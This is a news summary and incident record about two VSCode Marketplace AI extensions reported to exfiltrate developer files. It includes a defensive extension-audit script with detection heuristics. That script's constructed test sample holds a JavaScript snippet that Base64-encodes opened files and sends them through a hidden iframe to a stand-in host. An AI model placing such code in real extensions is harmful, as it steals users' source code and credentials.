Microsoft: Malicious AI extensions on VSCode Marketplace steal developer data

Malicious VSCode Extensions Exfiltrate Developer Data to China-Based Servers

Two AI-powered extensions in Microsoft’s Visual Studio Code (VSCode) Marketplace, collectively installed 1.5 million times, have been found exfiltrating developer data to servers based in China. Disguised as legitimate coding assistants, the extensions ChatGPT – 中文版 (1.34 million installs) and ChatMoss (CodeMoss) (150,000 installs) operate without disclosing their data-collection activities or obtaining user consent.

Researchers at Koi Security identified the extensions as part of a campaign dubbed MaliciousCorgi, noting they share identical spyware infrastructure and backend servers. Both remain available on the VSCode Marketplace as of publication.

The extensions employ three data-harvesting mechanisms:

  1. Real-time file monitoring – Any opened file is immediately encoded in Base64 and transmitted to attackers via a hidden iframe, capturing both initial content and subsequent edits.
  2. Server-controlled file theft – A stealth command exfiltrates up to 50 files from the victim’s workspace per request.
  3. User profiling – A zero-pixel iframe loads four commercial analytics SDKs (Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics) to track behavior, fingerprint devices, and build identity profiles.

The undocumented functionality poses severe risks, including exposure of source code, configuration files, cloud credentials, and sensitive .env files containing API keys. While Microsoft has been notified, no response has been received, and the extensions’ publisher remains unreachable.
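A defender-side audit script, added here as an example; it is not code from the article, from Koi Security's research or from Rankiteo's record. It walks the standard local extension layout (~/.vscode/extensions/<publisher>.<name>-<version>/package.json) and reports, per extension, whether the display name matches one of the names quoted above and whether its JavaScript references the four analytics SDK vendors named above next to iframe construction or Base64 encoding. The display names and SDK vendors come from the article; the iframe and Base64 regexes are this example's own heuristics, and the sample extension tree (publishers `constructed-benign` and `constructed-publisher`, host `tracker.example`) is constructed test data, not the real extensions' code.

```python
"""Heuristic audit of locally installed VS Code extensions (added example, see lead-in)."""
import json
import re
import tempfile
from pathlib import Path
from typing import Optional

# Display names quoted in the article, matched case-insensitively as substrings.
REPORTED_DISPLAY_NAMES = ("chatgpt – 中文版", "chatmoss", "codemoss")

# Analytics SDK vendors named in the article, matched as plain substrings in JS source.
ANALYTICS_SDK_MARKERS = ("zhuge", "growingio", "talkingdata", "baidu")

# Behavioural heuristics (this example's own assumptions, not indicators from the article).
# Source is lowercased before matching, so the patterns are lowercase.
IFRAME_RE = re.compile(r"createelement\(\s*['\"]iframe['\"]\s*\)|<iframe\b")
BASE64_RE = re.compile(r"\bbtoa\s*\(|\.tostring\(\s*['\"]base64['\"]\s*\)")


def iter_extensions(ext_root: Path):
    """Yield (directory, manifest) for every extension folder that carries a package.json."""
    if not ext_root.is_dir():
        return
    for ext_dir in sorted(ext_root.iterdir()):
        manifest_path = ext_dir / "package.json"
        if not (ext_dir.is_dir() and manifest_path.is_file()):
            continue
        try:
            yield ext_dir, json.loads(manifest_path.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, UnicodeDecodeError):
            continue  # unreadable manifest: skip it rather than abort the audit


def audit_extension(ext_dir: Path, manifest: dict) -> dict:
    """Return the extension id, display name and a list of human-readable findings."""
    display = str(manifest.get("displayName", ""))
    ext_id = f"{manifest.get('publisher', 'unknown')}.{manifest.get('name', 'unknown')}"
    findings = []
    if any(name in display.lower() for name in REPORTED_DISPLAY_NAMES):
        findings.append("display name matches an extension reported by Koi Security")

    sdks, uses_iframe, uses_base64 = set(), False, False
    for js_file in ext_dir.rglob("*.js"):
        src = js_file.read_text(encoding="utf-8", errors="ignore").lower()
        sdks.update(marker for marker in ANALYTICS_SDK_MARKERS if marker in src)
        uses_iframe = uses_iframe or IFRAME_RE.search(src) is not None
        uses_base64 = uses_base64 or BASE64_RE.search(src) is not None
    if sdks:
        findings.append("references analytics SDK(s): " + ", ".join(sorted(sdks)))
    if uses_iframe and (sdks or uses_base64):
        findings.append("builds an iframe next to analytics or Base64 code (hidden-iframe pattern)")
    return {"id": ext_id, "displayName": display, "path": str(ext_dir), "findings": findings}


def audit_extensions_dir(ext_root: Optional[Path] = None) -> list:
    """Audit every extension under ext_root (default: the standard ~/.vscode/extensions)."""
    root = ext_root or Path.home() / ".vscode" / "extensions"
    return [audit_extension(d, m) for d, m in iter_extensions(root)]


def build_sample_tree() -> Path:
    """Constructed extensions directory: one benign extension and one mimicking the article's behaviour."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))
    benign = root / "constructed-benign.hello-world-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"name": "hello-world", "publisher": "constructed-benign", "displayName": "Hello World"}),
        encoding="utf-8")
    (benign / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "exports.activate = () => vscode.window.showInformationMessage('hi');\n", encoding="utf-8")

    suspicious = root / "constructed-publisher.sample-assistant-2.3.4"
    suspicious.mkdir()
    (suspicious / "package.json").write_text(json.dumps(
        {"name": "sample-assistant", "publisher": "constructed-publisher",
         "displayName": "ChatMoss (constructed sample)"}), encoding="utf-8")
    # Constructed stand-in for the behaviour described in the article; not the real extension's code.
    (suspicious / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "vscode.workspace.onDidOpenTextDocument(d => {\n"
        "  const payload = Buffer.from(d.getText()).toString('base64');\n"
        "  panel.webview.html = `<iframe width=\"0\" height=\"0\" "
        "src=\"https://tracker.example/?p=${payload}\"></iframe>`;\n"
        "});\n"
        "// loads zhuge.io and growingio analytics SDKs\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    # Run against the constructed tree; drop the argument to audit the real local install.
    for result in audit_extensions_dir(build_sample_tree()):
        status = "FLAGGED" if result["findings"] else "ok"
        print(f"{status:8} {result['id']:45} {result['displayName']}")
        for finding in result["findings"]:
            print(f"         - {finding}")
```

The output is a triage list, not a verdict: an SDK substring or an iframe in a webview is common in legitimate extensions, so a flagged entry is a prompt to read the extension's source and publisher history before removing it, while a clean result says nothing about obfuscated or remotely loaded code.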

Source: https://www.bleepingcomputer.com/news/security/malicious-ai-extensions-on-vscode-marketplace-steal-developer-data/

Microsoft TPRM report: https://www.rankiteo.com/company/Microsoft

{
  "id": "Mic1769200079",
  "linkid": "Microsoft",
  "type": "Cyber Attack",
  "date": "1/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}
{'affected_entities': [{'customers_affected': '1.5 million users',
                        'industry': 'Software Development',
                        'location': 'Global',
                        'name': 'Microsoft VSCode Marketplace Users',
                        'size': '1.5 million installations',
                        'type': 'Developers'}],
 'attack_vector': 'Malicious Extensions',
 'customer_advisories': 'Users of *ChatGPT – 中文版* and *ChatMoss (CodeMoss)* '
                        'extensions are advised to uninstall them immediately '
                        'and review their systems for signs of data '
                        'exfiltration.',
 'data_breach': {'data_exfiltration': 'Yes (Base64-encoded files transmitted '
                                      'to China-based servers)',
                 'file_types_exposed': ['Source code files',
                                        'Configuration files',
                                        '.env files'],
                 'personally_identifiable_information': 'Yes (user behavior '
                                                        'data, device '
                                                        'fingerprints)',
                 'sensitivity_of_data': 'High (includes PII, credentials, and '
                                        'intellectual property)',
                 'type_of_data_compromised': ['Source code',
                                              'Configuration files',
                                              'Cloud credentials',
                                              'API keys',
                                              '.env files',
                                              'User behavior data',
                                              'Device fingerprints']},
 'description': 'Two AI-powered extensions in Microsoft’s Visual Studio Code '
                '(VSCode) Marketplace, collectively installed 1.5 million '
                'times, have been found exfiltrating developer data to servers '
                'based in China. Disguised as legitimate coding assistants, '
                'the extensions *ChatGPT – 中文版* (1.34 million installs) and '
                '*ChatMoss (CodeMoss)* (150,000 installs) operate without '
                'disclosing their data-collection activities or obtaining user '
                'consent. Researchers at Koi Security identified the '
                'extensions as part of a campaign dubbed *MaliciousCorgi*, '
                'noting they share identical spyware infrastructure and '
                'backend servers. Both remain available on the VSCode '
                'Marketplace as of publication.',
 'impact': {'brand_reputation_impact': 'Potential reputational damage to '
                                       'affected developers and organizations',
            'data_compromised': 'Source code, configuration files, cloud '
                                'credentials, API keys, .env files',
            'identity_theft_risk': 'High (user profiling and device '
                                   'fingerprinting)',
            'legal_liabilities': 'Potential regulatory violations (e.g., GDPR, '
                                 'CCPA)',
            'operational_impact': 'Potential exposure of sensitive development '
                                  'data',
            'systems_affected': 'VSCode installations with malicious '
                                'extensions'},
 'initial_access_broker': {'entry_point': 'Malicious VSCode extensions'},
 'investigation_status': 'Ongoing',
 'motivation': 'Data harvesting, user profiling, and potential intellectual '
               'property theft',
 'post_incident_analysis': {'corrective_actions': 'Microsoft should enhance '
                                                  'extension vetting '
                                                  'processes, enforce '
                                                  'disclosure requirements, '
                                                  'and implement automated '
                                                  'monitoring for suspicious '
                                                  'behavior in extensions.',
                            'root_causes': 'Lack of transparency in extension '
                                           'functionality, inadequate vetting '
                                           'of VSCode Marketplace extensions, '
                                           'and absence of user consent for '
                                           'data collection.'},
 'recommendations': 'Developers should audit installed VSCode extensions, '
                    'remove suspicious ones, and monitor for unauthorized data '
                    'exfiltration. Organizations should enforce stricter '
                    'extension policies and conduct regular security reviews.',
 'references': [{'source': 'Koi Security'}],
 'regulatory_compliance': {'regulations_violated': ['GDPR', 'CCPA']},
 'response': {'third_party_assistance': 'Koi Security'},
 'threat_actor': 'China-based actors',
 'title': 'Malicious VSCode Extensions Exfiltrate Developer Data to '
          'China-Based Servers',
 'type': 'Data Exfiltration',
 'vulnerability_exploited': 'Lack of disclosure and user consent for data '
                            'collection'}